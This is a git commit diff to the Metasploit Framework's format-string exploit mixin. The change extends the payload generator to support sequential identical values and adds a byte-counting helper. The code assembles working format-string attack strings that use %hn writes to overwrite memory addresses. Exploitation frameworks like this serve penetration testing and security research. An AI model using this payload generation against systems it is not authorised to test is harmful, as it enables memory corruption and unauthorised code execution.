now supporting sequential identical values!

git-svn-id: file:///home/svn/framework3/trunk@7691 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2009-12-04 07:45:08 +00:00 · 2009-12-04 07:45:08 +00:00 · 4ab9a59a39
commit 4ab9a59a39
parent 80422f24c4
1 changed files with 25 additions and 24 deletions
--- a/lib/msf/core/exploit/fmtstr.rb
+++ b/lib/msf/core/exploit/fmtstr.rb
@ -80,30 +80,29 @@ module Exploit::FormatString
 	# Generates a format string from an array of value/address pairs
 	#
 	def fmtstr_gen_from_array(num_printed, arr, targ = target)
-		npops = targ['NumPops']
-		npad = targ['PadBytes'] || 0
+		num_pops = targ['NumPops']
+		num_pad = targ['PadBytes'] || 0
 		
 		# sort the array -- for optimization
 		arr = arr.sort { |x,y| x[0] <=> y[0] }
 		
-		addrs = fmtstr_init_addrs(arr)
+		num = fmtstr_count_printed(num_printed, num_pad, num_pops, arr)
+		#print_status("#{num} bytes printed at first write..")
 		
-		# here on varies for DPA
-		num = num_printed + npad + addrs.length + (8*npops)
-		off = 0
+		# here on differs if DPA is supported
 		fmts = ""
-		
+		addrs = ""
 		arr.each do |el|
-			addrs[off * 8, 4] = [el[1]].pack('V')
+			# find out how much to advance the column value
 			prec = fmtstr_target_short(el[0], num)
+			#print_status(" adding [ %#8x, %#8x, %5d ]" % (el + [prec]))
 			if prec > 0
-				#dlog(" adding [ %#8x, %#8x, %4d, %5d ]" % (el + [prec]))
-				fmts << "%0" + prec.to_s + "x%hn"
-			else
-				throw "Writing sequential identical values is not currently supported."
+				addrs << rand_text(4)
+				fmts << "%0" + prec.to_s + "x"
 			end
+			addrs << [el[1]].pack('V')
+			fmts << "%hn"
 			num = el[0]
-			off += 1
 		end
 		
 		if (bad_idx = has_badchars?(addrs, payload_badchars))
@ -114,9 +113,9 @@ module Exploit::FormatString
 		end

 		# put it all together
-		stuff = rand_text(npad)
+		stuff = rand_text(num_pad)
 		stuff << addrs
-		stuff << "%8x" * npops
+		stuff << "%8x" * num_pops
 		stuff << fmts
 		
 		return stuff
@ -124,17 +123,19 @@ module Exploit::FormatString
 	
 	
 	#
-	# create a bunch of pointers to be used by the format string %n's later
+	# Count how many bytes will print before we reach the writing..
 	#
-	def fmtstr_init_addrs(arr)
-		# 2 for every entry, except the last one
-		num_ptr_bytes = ((arr.length-1)*2*4) + 4
-		if debugging?
-			addrs = pattern_create(num_ptr_bytes)
-		else
-			addrs = rand_text(num_ptr_bytes)
+	def fmtstr_count_printed(num_printed, num_pad, num_pops, arr)
+		
+		num = num_printed + num_pad + (8 * num_pops)
+		npr = num
+		arr.each do |el|
+			prec = fmtstr_target_short(el[0], npr)
+			num += 4 if prec > 0
+			num += 4
+			npr = el[0]
 		end
-		return addrs
+		return num
 	end
 	
 	#